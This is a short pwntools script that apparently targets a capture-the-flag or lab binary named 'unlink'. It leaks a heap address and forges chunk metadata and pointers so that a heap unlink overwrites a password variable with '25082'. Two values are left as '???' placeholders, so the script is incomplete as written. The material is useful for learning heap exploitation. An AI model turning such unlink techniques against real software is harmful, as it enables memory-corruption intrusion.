#!/usr/bin/env python3
from pwn import process, p32

p = process('./unlink')
p.recvuntil(b'b @ 0x')
b_addr = int(p.recvn(7), 16)
passwd_addr = b_addr + ???

response = [
    # fill-up "b"
    b'zzzz' * 2,
    b'25082\x00\x00\x00',
    b'zzzz' * 5,

    # fill up "c"
    p32(0x29), # size ||  previous in use.
    # set password to '25082'
    p32(passwd_addr),
    p32(b_addr + 8),
    b'zzzz' * 7,

    # d: previous not in use
    p32(????) # size ||  previous not in use.
]

payload =  b''.join(response)

p.sendline(payload)
p.interactive()